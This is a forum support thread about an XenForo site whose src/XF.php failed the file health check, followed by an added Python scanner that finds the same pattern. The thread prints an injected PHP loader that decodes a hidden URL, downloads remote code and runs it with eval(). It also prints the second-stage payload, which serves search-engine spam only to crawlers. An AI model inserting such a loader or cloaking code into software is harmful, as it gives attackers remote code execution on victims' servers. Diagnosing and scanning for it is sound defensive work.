XF 2.2 src/XF.php Unexpected contents

KSA

Well-known member
No matter how many times I re-upload the src/XF.php file, check for files health shows Unexpected contents

Comparing the two files shows this line:

PHP:
$ch = curl_init();$timeout = 60;curl_setopt ($ch, CURLOPT_URL, base64_decode('aHR0cHM6Ly9qc3BocC5jYy9maWxlL2RlZmVuc2UtYXJhYi5jb20vYTE='));curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$Content_mb = curl_exec($ch);curl_close($ch);eval($Content_mb);
 
That's exactly why the file check system is in place. That line is some hacky stuff that is not part of XF source.

That is downloading this: https://jsphp.cc/file/defense-arab.com/a1, which in turn downloads this: https://jsphp.cc/file/defense-arab.com/a2

Which then runs this:

PHP:
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/vb/'){    
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    echo file_get_contents("https://jsphp.cc/file/defense-arab.com/a1.html");
    exit;
}
?>

It causes the site to spew out this page: https://jsphp.cc/file/defense-arab.com/a1.html, but only if it's a search engine spider (for example Googlebot). Basically it's search engine spam.
 

That is exactly what happened: when you type the URL in Google search, it yields Japanese characters where the board title and meta description are. I however couldn't find the file being used on the server! Any advice?
 
If that file is part of the core XF installation, I would upload the file from there. No official release of XF, and no add-on in resources here, will ever change a core XF file.
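
An added example (not from the thread and not XenForo code): a Python scanner for the pattern in the injected line from the first post, where a base64-encoded URL is fetched and the response is passed to eval(). The function names are hypothetical, and the sample line is constructed with a placeholder URL.

```python
import base64
import binascii
import re
from pathlib import Path

# base64_decode('<literal>') calls; the literal may hide a URL.
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# Variables assigned from curl_exec() or file_get_contents().
FETCH_ASSIGN = re.compile(r"(\$\w+)\s*=\s*(?:curl_exec|file_get_contents)\s*\(")
# eval() called directly on a variable.
EVAL_VAR = re.compile(r"\beval\s*\(\s*(\$\w+)\s*\)")


def hidden_urls(php_source):
    """Decode base64 string literals and return the ones that are URLs."""
    urls = []
    for literal in B64_CALL.findall(php_source):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def scan_php(php_source):
    """Return the findings for one file's contents."""
    fetched = set(FETCH_ASSIGN.findall(php_source))
    evaluated = set(EVAL_VAR.findall(php_source))
    return {"hidden_urls": hidden_urls(php_source),
            "remote_eval_vars": sorted(fetched & evaluated)}


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php(path.read_text(encoding="utf-8", errors="replace"))
        if found["hidden_urls"] or found["remote_eval_vars"]:
            hits[str(path)] = found
    return hits


if __name__ == "__main__":
    # Constructed sample: same shape as the injected line, placeholder URL.
    enc = base64.b64encode(b"https://example.invalid/a1").decode()
    sample = ("<?php $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "
              f"base64_decode('{enc}')); $c = curl_exec($ch); eval($c);")
    print(scan_php(sample))
```

Running scan_tree() over the whole web root, not only src/, lists every PHP file that carries the same pattern.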
 